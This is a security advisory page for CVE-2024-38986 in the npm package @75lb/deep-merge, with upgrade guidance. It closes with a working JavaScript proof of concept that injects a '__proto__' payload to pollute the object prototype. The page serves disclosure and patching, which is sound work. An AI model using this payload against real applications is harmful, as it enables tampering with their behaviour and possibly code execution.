Improper Restriction of Operations within the Bounds of a Memory Buffer Affecting @75lb/deep-merge package, versions <1.1.2
Threat Intelligence
EPSS
0.11% (45th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-75LBDEEPMERGE-7575311
- published 31 Jul 2024
- disclosed 30 Jul 2024
- credit mestrtee
Introduced: 30 Jul 2024
CVE-2024-38986 Open this link in a new tabHow to fix?
Upgrade @75lb/deep-merge to version 1.1.2 or higher.
Overview
@75lb/deep-merge is a Deep-merge the values of one object structure into another
Affected versions of this package are vulnerable to Improper Restriction of Operations within the Bounds of a Memory Buffer through the merge methods of lodash to merge objects. An attacker can execute arbitrary code or cause a system crash by manipulating the input objects passed to these methods.
PoC
(async () => {
const lib = await import('@75lb/deep-merge');
var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
lib.default ({}, BAD_JSON)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();